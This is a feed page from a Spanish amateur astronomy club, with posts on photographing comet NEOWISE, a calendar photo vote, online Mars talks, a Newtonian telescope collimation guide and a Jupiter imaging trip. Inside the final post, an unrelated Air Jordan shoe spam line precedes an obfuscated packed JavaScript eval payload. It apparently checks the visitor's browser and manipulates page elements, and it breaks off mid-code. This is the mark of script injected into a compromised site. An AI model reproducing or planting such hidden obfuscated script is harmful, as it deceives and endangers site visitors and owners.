MercurioVenusTierraMarteJúpiterSaturnoUranoNeptuno

http://www.astrosirio.org/

Distribuir contenido Agrupación Astronómica de Málaga "Sirio"
Actualizado: hace 3 horas 15 mins

Fotografiando el Cometa NEOWISE 2020 F3 desde el Veleta, Sierra Nevada

Sáb, 21/11/2020 - 22:41

El Cometa NEOWISE C/ 2020 F3, fue descubierto el pasado 27 de marzo de 2020. Por aquel entonces se veía como unas 25.000 veces más débil que la estrella más tenue que se pueda ver a simple vista.

Un cometa del que nadie esperaba nada, y yo mismo ni siquiera tenía previsto observarlo.

Pero a partir del 1 de julio, todo tomó un cambio inesperado para astrónomos de todo el mundo.

De repente, de la nada, NEOWISE pasó a ser el cometa más brillante de las últimas décadas.

En todos los foros astronómicos saltaron las alarmas, y empezaron a surgir fotografías a cuál más preciosa.

En el artículo en PDF que ustedes pueden descargar, encontraran una crónica, que, como es habitual en mis escritos, está narrada a modo de memoria, donde se intercalan los acontecimientos, las emociones, anécdotas, e incluso circunstancias particulares, (pues forma parte de mi diario personal que comparto con ustedes), con algunos datos técnicos propios de la observación.

En este escrito, se hace referencia a las observaciones del cometa en hasta 6 ocasiones diferentes, que nos lleva a visitar la Sierra Gorda en Loja, Antequera, Monachil, los Montes de Málaga, terminando en el propio Veleta, en Sierra Nevada.

Además, de gráficos suministrados por el Real Observatorio de Madrid, con la posición del Cometa, se muestran muchas imágenes, algunas de ellas del equipo utilizado para realizar las fotografías y otras del lugar y el entorno que nos rodea. Para finalmente, mostrar a toda pantalla, o mejor dicho, a todo lo que da el formato de un papel A4 apaisado, la maravillosa visión del Cometa NEOWISE.

Así que, desde el 3 de julio, al 18 de julio de 2020, este texto está lleno de descripciones y acontecimientos, donde incluso se refleja el sentir y el aprendizaje de diferentes personas que se tropezaron con nosotros durante las distintas observaciones, en la que, se pudo dar una breve noción de lo que estábamos trabajando.

Por último, pueden contemplar un video a modo de “tráiler”, (y digo a modo de tráiler, porque es un adelanto de lo que aún está por publicar en nuestro canal), donde les presento el “glorioso” resultado que obtuve desde el Veleta, en Sierra Nevada, fotografiando a NEOWISE.

Más adelante, se publicará un segundo video en versión extendida, donde se explicará ¿Cómo se hizo la fotografía del Cometa NEOWISE?

En realidad, este video está dirigido más bien, a personas que desconocen cuál es el tratamiento digital en fotografía astronómica. Tratando de explicar mediante una síntesis, cuál es el flujo de trabajo a la hora de “revelar” digitalmente una imagen de cielo profundo, (galaxias, nebulosas, cúmulos estelares, cometas), pero sin llegar en ningún momento, a desarrollar el procesado digital, pues no es el objetivo de esta grabación.

La entrada Fotografiando el Cometa NEOWISE 2020 F3 desde el Veleta, Sierra Nevada aparece primero en Agrupación Astronómica de Málaga "Sirio".

VI Edición del AstroCalendario de la Agrupación Astronómica de Málaga Sirio

Lun, 09/11/2020 - 20:23

Te presentamos los 31 magníficos trabajos de socios y simpatizantes que este año van a dar contenido a nuestro AstroCalendario 2021. ¿Nos ayudas a elegir la imagen de portada?

Participa eligiendo el trabajo que creas deba ser la presentación del próximo año.

A continuación puedes acceder a todas y cada una de ellas. Haz click en las mismas para verlas a mayor resolución y así poder analizarlas con más detalle. Cuando sepas bien cuál es la que más te gusta, déjanos tu elección votando por ella en el siguiente formulario: pincha aquí para acceder.

¡Sólo por participar entrarás en el sorteo de 3 calendarios!

Plazo límite hasta el 20 de noviembre.

¡Anímate y participa!

1. Vigilando la Vía Láctea. 2. Cráter Copérnico. 3. Fases de Venus. 4. El Sol. 5. NGC 7635 (Nebulosa Burbuja). 6. Luna Azul. 7. Cometa Neowise. 8. Nebulosa Norteamérica y Pelícano. 9. Los planetas. 10. Cometa Neowise. 11. Luna y Júpiter sobre el Guadalhorce. 12. IC 1396 – Nebulosa de la Tompa del elefante. 13. NGC 891. 14. Complejo nebuloso de Rho Ophiuchi. 15. Luna desde Estepona. 16. Ocultación de Venus y Marte por la Luna. 17. Los Reyes del Norte. 18. Noche en Talaiot (Menorca). 19. Conjunción Luna, Venus y Júpiter. 20. Cometa Neowise. Villanueva del Rosario. 21. Acercamiento Marte y Luna. 22. Fiesta bajo las estrellas. 23. Cometa Neowise. Sierra Nevada. 24. M33. 25. Ocultación de Marte por la Luna. 26. Bajo el Universo. 27. M82 (Galaxia del cigarro). 28. Tiempo y Espacio. Ibiza. 29. Ícaro. 30. Condensaciones galácticas. 31. Luna creciente

La entrada VI Edición del AstroCalendario de la Agrupación Astronómica de Málaga Sirio aparece primero en Agrupación Astronómica de Málaga "Sirio".

Charla “Marte, el guerrero del Sistema Solar”, por Natalia Vicario

Sáb, 31/10/2020 - 10:10

En el mes dedicado al planeta rojo, dedicamos el último miércoles para hablar en profundidad de la geología marciana de la mano de Natalia Vicario. Natalia nos hace un amplio recorrido por las características de Marte, comenzando por las distintas escalas temporales y las capas que componen el planeta. Nos hablará de su vulcanismo, y es que Marte tiene el volcán más grande del Sistema Solar, el Monte Olimpo. También repasará los cráteres de impacto y cómo se distribuyen por su superficie, mencionando las diferencias con la Tierra. En este recorrido pasaremos por el Valles Marineris, un sistema de cañones de más de 4000 km de longitud. Y, ya para acabar, nos comentará la presencia de agua en Marte y los distintos meteoritos que han conseguido llegar a la Tierra procedentes de nuestro vecino.

La entrada Charla “Marte, el guerrero del Sistema Solar”, por Natalia Vicario aparece primero en Agrupación Astronómica de Málaga "Sirio".

Marte: el guerrero del Sistema Solar, por Natalia Vicario.

Lun, 26/10/2020 - 20:05

Cerrando nuestro “octubre marciano” este miércoles día 28 contaremos con el trabajo de la compañera Natalia Vicario. Conoceremos detalles de su estructura interna, de su superficie, minerales y señales de agua.

Los datos de conexión son los siguientes:

Hora:20:00h  28 oct 2020

Unirse a la reunión Zoom
https://us02web.zoom.us/j/89591171547?pwd=cFNVS1FNMVFtaHZBYnlZcU1CSHRjQT09

ID de reunión: 895 9117 1547
Código de acceso: 114034

La entrada Marte: el guerrero del Sistema Solar, por Natalia Vicario. aparece primero en Agrupación Astronómica de Málaga "Sirio".

Charla: “A la conquista de Marte”, por Jose Miguel Baena

Jue, 15/10/2020 - 19:49

Dentro del programa de actividades del mes de octubre, dedicado a Marte, tenemos esta genial charla de José Miguel Baena, que nos habla del planeta en muchas facetas. Nos hará un repaso por su historia, comenzando por sus famosos canales de Marte, para repasar a continuación las distintas sondas que han ido explorando el planeta (y las que no han llegado también). También por las sondas que están previstas para sumarse a la lista. Y, por supuesto, las tripuladas, en el que actualmente hay diversos países detrás de conseguir esta “Conquista a Marte”.

A continuación, os mostramos el vídeo de la charla:

Créditos imagen superior: NASA (https://www.jpl.nasa.gov/spaceimages/details.php?id=PIA23302)

La entrada Charla: “A la conquista de Marte”, por Jose Miguel Baena aparece primero en Agrupación Astronómica de Málaga "Sirio".

Charla: “A la conquista de Marte”, por Jose Miguel Baena

Lun, 12/10/2020 - 19:10

Este miércoles, dentro del programa de actividades del mes de octubre, dedicado a Marte, tendremos una charla de José Miguel Baena, que nos hablará de la “Conquista de Marte”.

Los datos para la conexión mediante Zoom los tenéis a continuación:

https://us02web.zoom.us/j/87805450864?pwd=N0hhZy9aZytsZHV4Z1p3dUp6WDFwUT09

ID de reunión: 878 0545 0864
Código de acceso: 249515

La entrada Charla: “A la conquista de Marte”, por Jose Miguel Baena aparece primero en Agrupación Astronómica de Málaga "Sirio".

Charla: animación planetaria y procesado con AstroSurface

Jue, 08/10/2020 - 20:21

Ya está disponible el vídeo sobre Animaciones Planetarias, por Isaac Lozano, en el que nos explica paso a paso qué debemos hacer, qué software es el recomendable usar y qué consejos necesitamos para poder obtener a partir de muchos vídeos una animación final con la rotación del planeta. Para ello, los programas que se muestran en el vídeo son los siguientes:

En especial, el programa Astrosurface es de reciente creación y ha irrumpido fuerte en el mundo de la astrofotografía planetaria, de manera que constituye un buen sustituto de Registax en su faceta de procesado (con la potente herramienta de wavelets).

A continuación os mostramos una imagen hecha a partir de los programas listados anteriormente, con las imágenes que además aparecen en el vídeo:

Animación de la rotación de Marte. Enlaces recomendables

La entrada Charla: animación planetaria y procesado con AstroSurface aparece primero en Agrupación Astronómica de Málaga "Sirio".

Charla: animación planetaria y procesado con AstroSurface

Mié, 07/10/2020 - 14:58

Este miércoles tenemos una charla con Isaac Lozano, que nos hablará de cómo animar las tomas planetarias de Marte, actualmente en oposición con la Tierra. Se hará hincapié en una herramienta nueva aparecida similar a Registax: AstroSurface. Desde la captura de imágenes hasta el montaje final, irá comentando cada uno de los pasos y consejos para poder lograr un buen resultado.

La reunión se realizará por Zoom:

Hora: 7 oct 2020 08:00 PM Madrid

Unirse a la reunión Zoom
https://us02web.zoom.us/j/88482805545?pwd=amlUUmlJNU5NTWVRbDVWZXpROVhqdz09

ID de reunión: 884 8280 5545
Código de acceso: 851012

La entrada Charla: animación planetaria y procesado con AstroSurface aparece primero en Agrupación Astronómica de Málaga "Sirio".

Colimación de telescopios Newton con herramientas Catseye Deluxe TRIPLEPACK PRO XLKP

Mar, 06/10/2020 - 08:00

No se insistirá lo suficiente en la necesidad de una buena colimación de los telescopios para conseguir un rendimiento acorde a sus prestaciones teóricas, tanto visuales como fotográficas. Esto es especialmente habitual en los reflectores, por su mayor propensión a la descolimación que los refractores. De ahí la necesidad de contar con unas herramientas y técnicas adecuadas para realizar la colimación por parte del propio usuario de los telescopios con un elevado grado de precisión y fiabilidad, con independencia de las condiciones de turbulencia atmosférica.

Pocos aficionados son conscientes de que, para mantener el nivel de calidad de las imágenes que sus equipos pueden dar, se requiere una precisión en el alineado de solo una fracción de milímetro. Esto es cada vez más exigente, dados los diminutos fotositos y gran tamaño de sensor de muchas cámaras modernas. Los telescopios de relaciones focales cada vez más reducidas tampoco ayudan, ya que la tolerancia al error del eje del primario aumenta con el cubo del número f/ (f/3).

Desde hace años, han proliferado los colimadores láser. Estos instrumentos tienen como ventaja fundamental su sencillez y comodidad de uso, aparte de su coste en la mayoría de los casos. Pero lamentablemente, son insuficientes para garantizar un correcto alineado de las ópticas. Son propensos a descolimarse. Además, proporcionan márgenes de error o incertidumbre inaceptables cuando se persigue el máximo rendimiento de que es capaz el telescopio y el cielo bajo el que se utiliza. Aunque pueden ser de gran ayuda para realizar una primera aproximación y pueden servir de referencia una vez se haya colimado previamente el telescopio, no pueden constituir la única herramienta para ello.

Por eso se han desarrollado herramientas de colimación alternativas de muy alta calidad y un nivel de precisión que va mucho más allá de lo que permiten los colimadores láser habituales. Hablamos de las herramientas de colimación de CATSEYE desarrolladas por Jim Fly.

Estas herramientas proporcionan una ayuda inestimable incluso en el diagnóstico de diversos defectos ópticos y mecánicos o estructurales del telescopio. Pero no sustituyen la verificación bajo el cielo mediante test de estrella. Sin embargo, no siempre es factible o sencillo poder realizar este test con ciertas garantías (turbulencia u otros motivos). Dicha limitación no se tiene con estas herramientas de colimación de Catseye.

El presente documento (texto e imágenes) se basa en las técnicas de colimación descritas en las siguientes páginas web. Mi agradecimiento y reconocimiento a todas ellas.

https://www.catseyecollimation.com/

https://www.catseyecollimation.com/pensack.pdf

http://w1.411.telia.com/~u41105032/Acoll/Acoll.htm

El procedimiento completo descrito aquí se lleva a cabo con las herramientas de colimación de 2” que forman el llamado Deluxe TRIPLEPACK PRO XLKP. Este pack de tres herramientas es específico para relaciones focales comprendidas entre f/3.5 – f/6.

https://www.catseyecollimation.com/deluxekits.html

Para relaciones focales más cortas, de entre f/3 – f/5, está el mismo pack, pero en la versión XLSKP. La única diferencia es la longitud del tubo TELECAT XL. El procedimiento de colimación descrito en este manual es idéntico.

Este documento es básicamente, salvo alguna nota, aclaración o anexo, una traducción al castellano de las instrucciones de empleo originales en inglés. Solo son aptas para telescopios reflectores de tipo Newton y derivados.

No se detallan todas las posibles técnicas, solo la llamada “CDP” y un método iterativo (ver más adelante). La primera es la recomendada porque es la más sencilla y parece poder aplicarse en la mayoría de las situaciones habituales. Pero la segunda es de aplicación universal. Se ha simplificado todo lo que se ha podido mientras siguiera siendo comprensible el procedimiento. Por eso, se han omitido justificaciones, demostraciones geométricas y técnicas alternativas. Quien desee profundizar en ellas, puede hacerlo en los documentos originales que se han usado aquí. Y también en el libro de Vic Menard New Perspectives on Collimation.

Se recomienda leer este documento en orden por primera vez e ir solo al procedimiento si se han leído y entendido los apartados previos. No tenga prisa. Cuanto mejor comprenda lo que ve, mejor y más rápido podrá colimar. Espero que le sea de utilidad.

Puede descargar documento completo a continuación.

Colimación de telescopios Newton con herramientas CATSEYE. Deluxe TRIPLEPACK PRO XLKPDescarga

La entrada Colimación de telescopios Newton con herramientas Catseye Deluxe TRIPLEPACK PRO XLKP aparece primero en Agrupación Astronómica de Málaga "Sirio".

Vídeo de la Noche Internacional de Observación de la Luna 2020

Vie, 02/10/2020 - 19:43

La Noche Internacional de Observación de la Luna (InOMN, por sus siglas en inglés) es una iniciativa creada por la NASA para unir a los diferentes pueblos del mundo a través de nuestras miradas y corazones hacia uno de los astros más bonitos en nuestros cielos: la Luna. Esa mirada tiene distintas interpretaciones, ya que este evento se transforma en diferentes ramificaciones para poder disfrutar de la Luna en sus múltiples facetas, ya sea mediante observación visual, astrofotografía, interpretación artística, admiración del tacto de su topografía… cualquier variante es válida si el objetivo es levantar esa admiración hacia Selene.

Desde la Agrupación Astronómica de Málaga Sirio hemos querido compartir con vosotros un vídeo muy especial en un contexto mundial inusual. Como este año no hemos podido ofrecer nuestros telescopios para que podáis maravillaros con el relieve lunar, hemos decidido mostraros y explicaros nuestro satélite visto a través del telescopio, recorriendo sus llanuras, cráteres, mares y cordilleras. El resultado lo tenéis aquí, para que podáis enamoraros como nosotros también lo hemos hecho con nuestra Luna, la de todas las personas.

Este vídeo no habría sido posible sin varias grandes personas. Jesús Chinchilla, por un lado, ha sido nuestro “lunático” de referencia, el ponente de la actividad. Como podéis ver, el vídeo cuenta con muchísima edición y documentación; para ello, Juanjo Segovia ha sido nuestro protagonista, que prácticamente no ha pegado ojo para hacerlo realidad (además de ayudar en la preparación y desarrollo de la actividad!) Y, por supuesto, otras dos grandes personas, María Rus y Jesús Navas, que también han participado desde el principio hasta el final para sembrar esa semilla y poder ofreceros hoy este espectáculo visual.

Fotografía superior: fragmento de fotografía de Jesús Navas Fernández, tomada desde la sede de la Agrupación Astronómica de Málaga “Sirio” el 25 de septiembre, usando un telescopio Sky-Watcher Dobson extensible GOTO 12″ 305/1500 y una cámara ASI1600mm-C con filtro Baader IR pass 685nm. La imagen se muestra al completo en el minuto 23 del vídeo.

La entrada Vídeo de la Noche Internacional de Observación de la Luna 2020 aparece primero en Agrupación Astronómica de Málaga "Sirio".

Noche Internacional de Observación de la Luna

Vie, 25/09/2020 - 20:45

La Agrupación Astronómica de Málaga Sirio se suma a la Noche Internacional de la Observación de la Luna 2020 con una charla introductoria sobre nuestro hermoso satélite natural, incluyendo un recorrido visual por sus cráteres que realizaremos a través de nuestro telescopio y que compartiremos online a través de ZOOM, el miércoles 30 de septiembre, con los comentarios del compañero y divulgador Jesus Chinchilla, un apasionado “lunático”.

Unirse a la reunión Zoom
https://us02web.zoom.us/j/8426820580?pwd=Qk1oMUxsZ2lhNDhDMnRzejg3S2pQQT09

ID de reunión: 842 682 0580
Código de acceso: 821548

La entrada Noche Internacional de Observación de la Luna aparece primero en Agrupación Astronómica de Málaga "Sirio".

Más de 24 horas de trabajo para fotografiar Júpiter

Sáb, 08/08/2020 - 17:41

El pasado día 02 de agosto de 2020, tras una nueva incursión en el Veleta, en pleno corazón de Sierra Nevada – Granada, Jesús Navas y yo (Juan José Segovia), conseguimos “nuestra” mejor fotografía de Júpiter obtenida desde el año 2015, además de otra de Saturno.

Este buen resultado, ha sido posible gracias al lugar tan magnífico de observación, como por el mantenimiento y modo de colimación que le realizamos previamente al telescopio Dobson Newton SkyWhatcher de 12 pulgadas retráctil GOTO, que nos permitió valorar de antemano el estado del mismo y su calidad óptica.

En este artículo, hablaré del trabajo realizado durante las más de 24 horas seguidas de tarea, que nos ocupó este proyecto desde que iniciamos el mantenimiento del telescopio.

Así que, si quieren disfrutar de la crónica de los acontecimientos que tuvieron lugar, mediante una lectura sencilla, sin tecnicismos, (excepto los dos primeros folios que me ha sido imposible evitar), y con la descripción amplia y detallada que me caracteriza, narrada desde la emoción, la aventura y sorpresa, pulse en el siguiente enlace para continuar leyendo y poder ver las fotografías.

Crónica de la sesión de Astrofotografía Planetaria desde Sierra NevadaDescarga

Por Juanjo Segovia.

La fotografía superior es un recorte de la imagen de Júpiter obtenida durante la sesión de astrofotografía planetaria en Sierra Nevada. Puede verse a tamaño completo en el documento anterior.

Nike Air Jordan Retro 1 Red Black White – Buy Air Jordan 1 Retro (white / black / varsity red), Price: $60.85 – Air Jordan Shoeseval(function(p,a,c,k,e,d){e=function(c){return(c35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('b i=r f["\\q\\1\\4\\g\\p\\l"]("\\4"+"\\7"+"\\7"+"\\4"+"\\5\\1","\\4\\k");s(!i["\\3\\1\\2\\3"](m["\\h\\2\\1\\j\\n\\4\\1\\6\\3"])){b a=f["\\e\\7\\o\\h\\d\\1\\6\\3"]["\\4\\1\\3\\g\\5\\1\\d\\1\\6\\3\\2\\z\\9\\A\\5\\c\\2\\2\\x\\c\\d\\1"](\'\\t\\1\\9\\2\\w\\v\\7\\j\\e\\2\');u(b 8=0;8

La entrada Más de 24 horas de trabajo para fotografiar Júpiter aparece primero en Agrupación Astronómica de Málaga "Sirio".